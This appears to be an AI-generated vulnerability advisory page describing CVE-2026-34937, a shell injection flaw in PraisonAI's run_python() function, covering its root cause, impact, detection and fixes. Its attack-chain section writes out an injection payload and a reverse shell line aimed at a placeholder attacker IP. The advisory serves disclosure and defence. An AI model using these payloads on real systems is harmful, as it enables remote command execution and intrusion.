
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34937 is a shell injection vulnerability in the run_python() function of the PraisonAI praisonaiagents package, allowing arbitrary OS command execution via unescaped shell metacharacters. It affects praisonaiagents versions up to and including 1.5.89, with version 1.5.90 containing the fix. The vulnerability was published on March 31, 2026 by the maintainer and added to the GitHub Advisory Database on April 1, 2026. The GitHub Advisory assigns a CVSS v3.1 score of 7.8 (High) with a local attack vector, while Feedly's threat intelligence estimates a network-accessible score of 9.8 (Critical) (GitHub Advisory, PraisonAI Advisory).
The root cause is CWE-78 (OS Command Injection): the run_python() function in execute_command.py constructs a shell command by interpolating user-controlled input directly into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The incomplete escaping logic only sanitizes backslashes (\) and double quotes ("), leaving $() command substitution and backtick expressions unescaped. Because the shell processes these metacharacters before Python is invoked, an attacker can inject arbitrary OS commands through the code parameter. The vulnerability is further aggravated by the auto-generated Flask server deploying with AUTH_ENABLED = False by default when no token is configured, making the function reachable without authentication (GitHub Advisory, PraisonAI Advisory).
Vulnerable code path:
# execute_command.py:290 (source)
def run_python(code: str, cwd=None, timeout=60):
# execute_command.py:297 (hop) -- incomplete escaping
escaped_code = code.replace('\\', '\\\\').replace('"', '\\"')
command = f'{python_cmd} -c "{escaped_code}"'
# execute_command.py:310 (sink) -- shell=True expands $() before python3 runs
return execute_command(command=command, cwd=cwd, timeout=timeout)Successful exploitation grants an attacker arbitrary OS command execution with the privileges of the praisonai process, resulting in high confidentiality, integrity, and availability impact. Any agent pipeline or API consumer that passes user- or task-supplied content to run_python() is fully exposed, including scenarios involving indirect prompt injection where an AI agent autonomously calls the function with attacker-controlled input. The default unauthenticated Flask server deployment significantly broadens the attack surface, potentially enabling lateral movement within the host environment or exfiltration of sensitive data accessible to the process user (GitHub Advisory, PraisonAI Advisory).
A public proof-of-concept exploit is available in the GitHub Security Advisory, demonstrating command execution via run_python(code='$(id > /tmp/injected)') on a real PraisonAI installation (PraisonAI Advisory). Feedly classifies the PoC confidence as high and confirms it is a real, standalone runnable exploit. There is no current evidence of in-the-wild exploitation, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.027–0.037%, placing it in the lower percentiles for near-term exploitation probability (GitHub Advisory).
praisonaiagents <= 1.5.89, particularly those with the auto-generated Flask server accessible on the network (default: AUTH_ENABLED = False).run_python() function in praisonai/code/tools/execute_command.py.code parameter value containing a $() command substitution, e.g., $(id > /tmp/injected) or a reverse shell payload such as $(bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1).run_python()).$() before Python is invoked, executing the injected OS command as the praisonai process user./tmp/injected for output), then establish persistence or pivot within the environment as needed (GitHub Advisory, PraisonAI Advisory).code parameters containing $(), backticks, or other shell metacharacters./tmp/ or other world-writable directories (e.g., /tmp/injected); new scripts, cron jobs, or SSH authorized keys added by the praisonai process user; web shells or backdoors in accessible directories.$(), `) in code parameters; OS audit logs (e.g., auditd) recording unexpected bash, sh, curl, or wget processes spawned as children of the Python process./bin/bash, nc, curl, wget, python3) executing system commands not consistent with normal agent operation (GitHub Advisory).Upgrade praisonaiagents to version 1.5.90 or later, which contains the patch for this vulnerability (GitHub Advisory). As interim mitigations: restrict network access to the PraisonAI Flask server and enable authentication (AUTH_ENABLED = True) if the server must be exposed; avoid passing untrusted or user-controlled input to run_python(); and refactor subprocess calls to use argument lists instead of shell=True to prevent shell metacharacter expansion. Input validation rejecting $(), backticks, and other shell metacharacters should also be implemented as a defense-in-depth measure (PraisonAI Advisory).
The vulnerability was reported by security researcher YeranG30 and published by the PraisonAI maintainer (MervinPraison) on March 31, 2026 (PraisonAI Advisory). Brief community discussion was noted on Mastodon via @thehackerwire, and the CVE was picked up by several vulnerability tracking services including VulDB, CVEFeed, and Red Hat's CVE database shortly after disclosure. No major vendor statements or significant media coverage beyond standard CVE aggregation have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."